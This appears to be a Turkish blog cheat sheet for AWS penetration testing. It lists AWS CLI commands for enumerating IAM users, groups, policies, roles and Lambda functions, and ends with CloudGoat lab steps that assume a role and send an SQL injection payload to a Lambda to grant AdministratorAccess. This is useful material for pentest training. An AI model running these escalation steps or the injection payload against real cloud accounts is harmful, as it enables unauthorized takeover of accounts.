İçeriğe geç

AWS Pentesting Cheat Sheet

O gün bazı yüzler de nimet içindedir (mutludur).
Çalışmalarından memnundur.
Yüksek bir cennettedir.
Orada boş söz duymaz.
Gaşiye 8-11

1. Enumeration

1.1. IAM

1.1.1. Users

# List users
aws iam list-users

aws iam list-ssh-public-keys #User keys for CodeCommit

aws iam get-ssh-public-key --user-name <username> --ssh-public-key-id <id> --encoding SSH #Get public key with metadata

aws iam list-service-specific-credentials #Get special permissions of the IAM user over specific services

aws iam get-user --user-name <username> #Get metadata of user, included permissions boundaries

aws iam list-access-keys #List created access keys

1.1.2. Group

# List groups
aws iam list-groups #Get groups

aws iam list-groups-for-user --user-name <username> #Get groups of a user

aws iam get-group --group-name <name> #Get group name info

1.1.3. Policy

## inline policies
aws iam list-user-policies --user-name <username> #Get inline policies of the user

aws iam get-user-policy --user-name <username> --policy-name <policyname> #Get inline policy details

## attached policies
aws iam list-attached-user-policies --user-name <username> #Get policies of user, it doesn't get inline policies

aws iam get-group --group-name <name> #Get group name info

## inline policies
aws iam list-group-policies --group-name <username> #Get inline policies of the group

aws iam get-group-policy --group-name <username> --policy-name <policyname> #Get an inline policy info

## attached policies
aws iam list-attached-group-policies --group-name <name> #Get policies of group, it doesn't get inline policies

## inline policies
aws iam list-role-policies --role-name <name> #Get inline policies of a role

aws iam get-role-policy --role-name <name> --policy-name <name> #Get inline policy details

aws iam list-attached-role-policies --role-name <role-name> #Get policies of role, it doesn't get inline policies

# List policies
aws iam list-policies [--only-attached] [--scope Local]

aws iam list-policies-granting-service-access --arn <identity> --service-namespaces <svc> # Get list of policies that give access to the user to the service

## Get policy content
aws iam get-policy --policy-arn <policy_arn>

aws iam list-policy-versions --policy-arn <arn>

aws iam get-policy-version --policy-arn <arn:aws:iam::975426262029:policy/list_apigateways> --version-id <VERSION_X>

1.1.4. Role

# This command will list all the roles in your account, one of which should be assumable. 
aws --profile bilbo --region us-east-1 iam list-roles | grep cg-

# This command will list all policies for the target role
aws --profile bilbo --region us-east-1 iam list-role-policies --role-name [cg-target-role]

# This command will get you credentials for the cloudgoat role that can invoke lambdas.
aws --profile bilbo --region us-east-1 sts assume-role --role-arn [cg-lambda-invoker_arn] --role-session-name [whatever_you_want_here]

# This command will return a bunch of information about the lambda that can apply policies to bilbo.
aws --profile assumed_role --region us-east-1 lambda get-function --function-name [policy_applier_lambda_name]

1.2. Lambda

1.2.1. List

# This command will show you all lambda functions. The function belonging to cloudgoat (the name should start with "cg-")
aws --profile assumed_role --region us-east-1 lambda list-functions

# This command will return a bunch of information about the lambda that can apply policies to bilbo.
aws --profile assumed_role --region us-east-1 lambda get-function --function-name [policy_applier_lambda_name]

1.2.2. Invoke

# The following command will send a SQL injection payload to the lambda function
aws --profile assumed_role --region us-east-1 lambda invoke --function-name [policy_applier_lambda_name] --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": [bilbo_user_name_here]}' out.txt

NOT: Güncellenecektir…

Kategori:AWSAWS PentestingCheat Sheet

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir